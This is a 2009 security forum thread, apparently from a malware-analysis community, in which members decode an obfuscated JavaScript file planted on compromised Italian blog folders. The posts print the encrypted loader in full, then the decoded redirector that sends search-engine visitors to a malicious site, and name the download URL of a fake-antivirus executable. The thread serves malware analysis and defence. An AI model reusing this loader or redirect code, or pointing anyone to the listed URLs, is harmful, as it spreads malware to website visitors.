Author Topic: Need help to decoding obfuscated script  (Read 8355 times)

0 Members and 1 Guest are viewing this topic.

September 08, 2009, 01:49:27 am
Read 8355 times

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
A search online with Google yesterday but also today

Code: [Select]
site:.it bmblog

 has find hundreds of sites IT with one subfolder named /bmblog/ and with included this obfuscated javascript.

Code: [Select]
http://carlosimoni.it/download/forum/bmblog/css.js
 
 var host = '1040116111621123058404750476110710181199099010111082108311241045111611071018115904501111118210131144118510561017119804690990111110920473';
 var pid = '58s07';
 var sid = '9f93bc';
 function dIF(S)
 {
   function sKO(m)
   {
     var T = new Array(Math.ceil(m.length / 4));
     for (var l = 0; l < T.length; l++)
     {
       T[l] = m.charCodeAt(l * 4) + (m.charCodeAt(l * 4 + 1) << 8) + (m.charCodeAt(l * 4 + 2) << 16) + (m.charCodeAt(l * 4 + 3) << 24);
     }
     return T;
   }
   function lQK(T)
   {
     var j = new Array(T.length);
     for (var l = 0; l < T.length; l++)
     {
       j[l] = String.fromCharCode(T[l] & 255, T[l] >>> 8 & 255, T[l] >>> 16 & 255, T[l] >>> 24 & 255);
     }
     return j.join("");
   }
   function uPG(m)
   {
     return m.replace(/!\d\d?\d?!/g, function (c)
     {
       return String.fromCharCode(c.slice(1, -1));
     }
     );
   }
   function cGU(m)
   {
     return m.replace(/[\0\t\n\v\f\r]/g, "");
   }
   try
   {
     var eUV = eval(lQK([1818326629]));
     var d = sKO(uPG(S));
     var i = this.toString().replace(/[\0\t\n\v\f\r\xa0!]/g, "");
     var C = sKO(i);
     var O = d.length;
     var P = d[O - 1], g = d[0], y = 2654435769;
     var F, N, sum = Math.floor(6 + 52 / O) * y;
     while (sum != 0)
     {
       N = sum >>> 2 & Math.floor(i.length / 4) - 4;
       for (var k = O - 1; k > 0; k--)
       {
         P = d[k - 1];
         F = (P >>> 5 ^ g << 2) + (g >>> 3 ^ P << 4) ^ (sum ^ g) + (C[k & 3 ^ N] ^ P);
         g = d[k] -= F;
       }
       P = d[O - 1];
       F = (P >>> 5 ^ g << 2) + (g >>> 3 ^ P << 4) ^ (sum ^ g) + (C[k & 3 ^ N] ^ P);
       g = d[0] -= F;
       sum -= y;
     }
     eUV(cGU(unescape(lQK(d).replace(/[\0]+$/, ""))));
   }
   catch (e)
   {
     try
     {
       eUV.apply(eUV, [cGU(unescape(lQK(d).replace(/[\0]+$/, "")))]);
     }
     catch (e)
     {
       eval(cGU(unescape(lQK(d).replace(/[\0]+$/, ""))));
     }
   }
 }
 dIF.apply(dIF, [unescape("%C9%EF%94%1E%F4tg%FA5%800%7B%3E%3AC%84%28T%2CPhVo%A2%3E%CB%16%CA%F5oz%23%B8dh%13%96%2111%21%B8%99%1B%B0%2C%C5%88W%11i%B0%18%BE%3F%9F%D9%AC%7E%25p%9Cl%1C%2C%9F%A9i%B3%87%87%C3%B7%A7%16%C1%9Fq_%0F%2Ci%F7f%FDEp%10%C7%1F%D2%5D%9B%FA6%97%C3%BE%A4%23A%C0%D24%C3-%2112%21%21160%21%AB8lGv%01%81%8C%90%5D%D2%86%AF%E1c%BD%CEO%B2%96%9F9%88%87_Y%E0%C9%8A%CEER%C5rV/%85%83%1A%5E%BA%81NK%F7%C6%05%86%0F%3CU%89%1B%F2%22%FE%17%BF%CE%07%219%21%AB%3EO%2110%21Y%C9%88%18L%97%7D%D6%DA%C4%1B%BC%E2%90%84%3A%7B%F2%1B%98%9E%EC%2C%2CzW%125%222%D0%DE%E4qo%1B%219%21%D1%0E%CA%D0%F4%EF%CEV%9F%5B%EE%9A%11%A10%20RRM%D0%25%23%C0%8B%98%14%86%9B%EE%F5%A6%F0%E0%B6%F6%121B%8AH%EA%FD%F4%9F%EC%03%B0%83%B2%8Fz%210%21%EC%19%7B%2133%21%88%13%9A8c%91i%0E%DEI%25%AD%A6%26%BEzhOC%EB%B5%B1%17%8E%1E-%BE%25Fj%F8%1E9%03%99W%2110%21U%C7%C1%3E%A9%8B%219%21%8F%05v4K0%1FK2%D8%E2n%C9Av%E2D%9B%DA%DD.%F4%219%21%BA%8D%C9WX%D3%C6%F1%5D%FD%94%14%C8%12n88%A3m%07%8BU%8E%F5%BA%FE%E0L%E5%1E%BF%24%23%B8%F1%03s%03%F2%87%9F%FDI%B4%9C%23%B6%AC%FF%2113%21E%88Wp%B4%BDa%DC%97%219%21%F2OE%C2%F8%B1%9E%D49%B1%82%ACJ%FF%FB%3F%FB%1Br%F3%10%28W%B4%1Dd%3B%B6+8%93g%17%93%5B7%B7C%18%3Aj%C6N%B7%879%11%84%E3%A9L%D6%22%5B%84%EC%C6%07%BE%A8%81Tw%C8c%9A%82%D4%D9%97%B97%1Eb%FB%B8%E4I%E4nlU%C9%5E%B0%F4f%C0+%AF%15%C2%9EH%C2%7C-%CE%D2%FD%F7m%7C%3A8F%B5_%20%C8%F7E%60%E3%EB%DAv%60%3CGj%80%E9yW%AF%D7%C9%2113%21D@%E9%CC%3C%85F%AE%89%22%04%210%21%1E%BF0M%B2%C5%020%B9%C4%B9%15t%60%FC%C4%17%89ex%ED%F7%DD%1D%C7%C1%F1%BEZD%EB%F7WNK%82%F0%2111%21%06%D7q%3D%10%D0Nhu%ED%E3%88%B1vf%12%3D9bb%E6k%8B%10%8A%E3%E2%2112%21%2111%21%CB%23%BC%E8%14%23%0E%3A%A9%CC%82%60%D1l%F5%DF%CF%D7%D8%FF%08Au%D17%CE%99%F7l%B53d%9A%E2%0E%219%21%D2-%DE%C8%A7%C4%5B%C8%06%1A%2110%21%BD5%7Fz%A6%9C%80%F7%C4%EBc-%F8%97%87%B4k%0E%CE%C7r%98.%5C%3E%FA%C2%14%83%BF%AD%E7m%C4%CA%9F%234%82%16%D16%F1F%113%2113%21%F1%3D%01R%B3hJ%F1U%7E%D5%FA8%0E%AE%C8%C2%7F%D2%05x%CA%D4%13%8A%82%9B%C5%C2%B4%C8%EDy%88%A1%28%C1%C8%C7BC%3F%B6%F8%8F%7Ec%1C%AA%3C%168%23SMf%BB%BA%3E%E0%81%A3%99%7B%8AKGS%06%EF%90%F17%14%97%14%BA%D2%A4%D0%88%9Ed%A3%E0%D2%2111%21X+%B5%9D%60%19%DB%12f%D3%B4%ECt%B5%BA%E5%C8K0r%7F%99%C70%E9%DD%28%A3%84%B2w%C3%F5%BBc%F1%CE%C0%5DO%2C%20%03*%DDG%C7%A1H%210%21%F3c%01%1E%2133%21%83%219%21j%7E%60%2112%21%C8%C4%7E%82%CD5%3B%28%2111%21%8B%D8%8C%A4%29j%8A3%91%CA%F22%06%DC%AAVT%83%04-%DD%E5%17f%AB%CB%F3%F9%AB%BA-%C8%3C%04DY%B8VR%C0%11%14%C0Z+%AEJ%8C%B3%2110%21%FAP%DF%89Gf%DF%B9%AF%13B.%8F%E3H%A6%3D%08%2133%21%02%DC%AC%B8%2111%21%99%7E%3B%E3%5E%3Av%93%FB%14%D21%2113%21%2112%21X%E3%AE%F8%3E.TJ%0E%D4%89%85%CC%27%0E%D6%20%BE%DC%98j%F6G%AF-%A6%8D%21160%219%19%21160%21%C31%03%D8C%2C%5C%2112%21%9E%8A%28%F3%B6%99%E5L/pc%2111%21%AA%1A%210%21%D8%846%97%87%EEQ%ECS%89%1C_%9Di%5Bp%FB%A6%87%A8%C4%D4%AD%AF%08%EA%05h%27G%E4%D3%8C-w%CC%A5%1C%EE%1A%E7%08%85r%8EF%8F%9D%E0%A3%E0B%12%8FU%C5%5D%210%21%97%B7%7F%FER0%7D%FA%A7%DARr%B6%7B%80Jy%9E9%E7%3Dw%B1M%CA%99%0E%3A5%20%EC%89%B8%E0%ED%8D%90P0%A6mjW%F4%F0%07%10%FC%98A%85%F70%CF%EDn%5D6v%83%EC%D3%C5%219%21A%9AGd0%C0%3C%3ED%ED%03%DD8%D7%5B%B1%BC%60%8F%C3%04%B5%08%E8%7B%210%21%02%11%C4Y%AB%D4g%05-N%19%E5%5C%DA%29%27O%F7%91%27%22%3D%B4%14%A4%87%C1%7D%17i%9C%AB%DE/%08_%BD%25%23%E9%7D%D4%28%1F%CE%08%8D%18%92%15%A2-%7D%EF%07v%02LX%FE%83%EF%E0%25a%14%F5%C1h%5B@%A8V%D6%A6c%C6%03%C1Q%17%13%C48%EA%5B%A6%83%FC%EDMcq%80%A2%D2%27%2111%21%EF%04%FE%16Q%A1%D8%E6%C1%9C%85%B5%BDE%FC%E9%B9%A6%3Bf3%958i%DA%B3%F7%3F5%01%E5%C8R%24%EE3%F2%C7k%DDP%F6%E90%60%60yZ%D0%9A%BBI%2112%21J%2112%21%C7%BB+%FC%8E%85%FD%89K%B7%B3a%15%EE%24Y%7E%E1p%C3j%2111%21%DCtE%E4%FD%E9%D1%29W%DC%CD%7D%FC%2112%21j%C9%2113%21%A7%B43%22%F3-%A8%BA%DB%7D%C2%A7iW%F4%95%219%21k%97%29%FB2%B5%7Bg%B3e%B7%5B%2111%21V%F8%EC%D1%CBx%2111%21%BEr8%F6%DFc%F1c%3B%A9%C3%13%93%DD%84g%D6sC%D9%219%21%2113%21%25G%9B%1B1%AB%B1%A4EH%60K%210%21k%C0%F9p%8E%05%2113%21*%C8%D4%F7%B3%5D%93%8F%BE79%A4%17%1C%97Q%E8%22%C3%9A%D1%CES%26%B83%E4Le%AD%3F%D5%26f%D7T%A4%16%F1%DB%B6%A3%16%C0%3A%9A%F6L%16%F9%F3x%83QF%B1%14%EB%F9%E0%12dbe%5E*%81%C3%3A5S%058F%1D%20%D2%5B%18%D6g%7E%CC%B8%A8%DB%DB%26%A5%F7%FD%C0%14%C4%80%25%ED%DCi%A1uq%DCH%89%21160%21%FB%EC%E0%8A%92%A9%CE%219%21%13%D6%AF%7D%DFw%04%C5%C1J%D2%E8%E7%89%B9%FEM%2133%21%2133%21%12%B9%EFk%F9y%3E%B0%F5%EA%B7%26i%B9%CFbG%AB%1C%B8%B1_%EAX%26w3%DA%FF%06ahF%85u%FD%1C9%C3@%01%3D%93%DF%9F%D1r%9Fs%60%8F%B8%1E%CC%06%5B%1F@A%1D%12%AAR%8C%13%90%FD%C8%B3%27ri%B2%B6%9D%F4hG%F2G%E8%3D%D4+%8F%20w%94%E6%25%D2%E6%19%D7%88%13%19n%E8%D4%8F%21160%21%3D%5C@%BFr%B4T%FC%CE%DD%B0%99%C5%D1%C5%A2%7E%E5%177%9A%2844%80org%9D%A5Ib%81%B6%1B%977%B0%AF%B3%5CIG%FE%219%21%60%19%82r9%E3%99%29%210%21%B8%9C%B6%ED%A9%24%A1%17%F0%9B%A8%CES%E3%E7%17%DFBWj%89OE%8B%BC%3Cb%CD%E7%A9%0E%95%C5m%3AZ%D9%B6%11%8D%FF%FE%BF%FEd%3CQ%14%96%1D%D2v@%8A%FE%CE%A3R%3FPh%3CY%8A@%01G%9Ef%91X%97%82%E2%80%23%1E%D3%BD%B0Om%AF%04%D3%0FP7%D8%5E%B4%27%82%93%1Ce%2C%88%D1%FB%81%0E%B5%96%03%3D%84%F0%BE%2133%21%B0%219%21%21160%21%89%DF%02%5E%ECI%82%26%25%06%E4%A4%E3%EEr%3B%0E%5C%AFu%80P%F5%FE%AF%91%1F%87%9AhU%A6V%14%8B%1A%A30%A7%05%A4%B6%C2%FE%7F%2111%21%14q%5C%7F%E0%7C%86%A8f%263%F8%D1%5Eb%F2%02y%C4d%17%03%7B%1F%D3%B9P%9C%3D%13%01%EF%F2%BF%B4%2113%21G%3B%C6%E3%2111%21%B9%CE%D7%F9%1Fw@%3A%DD%C26%C0%A6%B5%A8%C0%C6%EB%A9%18%D9%E5F%1FP%CD%F7%AF%04c%E8%DCW%EES%5BR%D9%F2%D3Z%2110%21%06%210%21%2111%21%13%5D%8F%DF%EB%8CJ%98%91%E0_h%90%E0%CF%E1%1D*%EA%C8%13%D6%DE%7Ck%C1%BDT%606%A8%A2%3C%E5W%8E8cj%95Cm%C6%299%15%1A8%DB%B8%F1%A1%8B%CCwx%93%23%3B%2112%21%ABA%F3%FA%3Fgy%D1h%B5%91%CA%60j%5EX%7D%85%A3%15Q%8D%92K%27%F8%A6%B1%E9%95%FF%3E9P%F9%BC8%EDB%AE%A9%D8%9D%2112%21%ED%7C%F2%C3%ED%E2%F5V%05k%D1%1C%7C%28_%A2%C89oS%CB%E1%C9%210%21%C6%26%81%85%C7m%B6%FE%A3%AB%A8%9DS%F3l%CE%D4%A1%C1%C1%17%D6%FBLU%A1%3CB%F9%5D%80%B4%E4%7C5%D7%9Ec%15P%93z%D4%3AJaPG%F5%2C%8A%17%83%C6%FD%B4%ECC%AD%D8")]);
 

Analyzed by Wepawet return  the same result when i analize with  Malzilla. (no decoded)

Some tips for decoding??

thanks

Edgar from Bangkok   :)

http://edetools.blogspot.com/

September 08, 2009, 03:35:57 am
Reply #1

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
I add some INFO about downloaded fake blogs pages at

http://edetools.blogspot.com/2009/09/bmblog.html


Edgar from Bangkok  :)

September 08, 2009, 06:34:11 am
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
jsunpack returned the following script
Code: [Select]
var host = '1040116111621123058404750476110710181199099010111082108311241045111611071018115904501111118210131144118510561017119804690990111110920473';
 var pid = '58s07';
 var sid = '9f93bc';
 var sc_project = 5073591;
 var sc_invisible = 1;
 var sc_partition = 58;
 var sc_click_stat = 1;
 var sc_security = "ad5bbc56";
 var _host = '';
 for (var i = 0; i < host.length; i = i + 4)
 {
   if (host.substr(i, 1) == '0')
   {
     _host = _host + String.fromCharCode(parseInt(host.substr(i+1, 2)));
   }
   else
   {
     _host = _host + String.fromCharCode(parseInt(host.substr(i, 3)));
   }
 }
 var url = _host+'?pid='+pid+'&sid='+sid;
 if (document.referrer && document.referrer != '' &&    (        document.referrer.match(/msn/i) || document.referrer.match(/live/i) ||        document.referrer.match(/altavista/i) ||document.referrer.match(/baidu/i) ||        document.referrer.match(/yahoo/i) ||        (            document.referrer.match(/google/i) &&             (                document.referrer.match(/imgres/i) ||                 document.referrer.match(/search/i) ||                 document.referrer.match(/blogsearch/i)             )         )    ))
 {
   if (top.location.replace)
   {
     top.location.replace(url);
   }
   else
   {
     top.location.href = url;
   }
 }
 function addLoadEvent(func)
 {
   var oldonload = window.onload;
   if (typeof window.onload != 'function')
   {
     window.onload = func;
   }
   else
   {
     window.onload = function()
     {
       if (oldonload)
       {
         oldonload();
       }
       func();
     }
   }
 }
 addLoadEvent(function()
 {
   var s = document.createElement('SCRIPT');
   s.setAttribute('type', 'text/javascript');
   s.setAttribute('src', 'http://www.statcounter.com/counter/counter.js');
   document.body.appendChild(s);
 }
 );
 

decoded url is :

Code: [Select]
newcellphones-overview.com/?pid=58s07&sid=9f93bc
Ruining the bad guy's day

September 08, 2009, 07:05:08 am
Reply #3

cleanmx

  • Special Members
  • Hero Member

  • Offline
  • *

  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
payload is:

Code: [Select]
http://fast-virus-scan9.com/download/Soft_58s7.exe

September 08, 2009, 08:59:36 am
Reply #4

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
   
Many thanks for the suggestion to use jsunpack for decoding the script. Jsunpack working very good.

I confirm the payload downloaded from fake online scanner hosted over 2 IP. (Belize and  Costa Rica)

Over the UK servers the numbers of sites with inclusion /bmblog/    constantly increasing.

I proceeded to complete the post on my blog with new data acquired with the execution of the script.and analisys of URL.

http://edetools.blogspot.com/2009/09/bmblog-la-decodifica-dello-script.html

Regards

Edgar  :)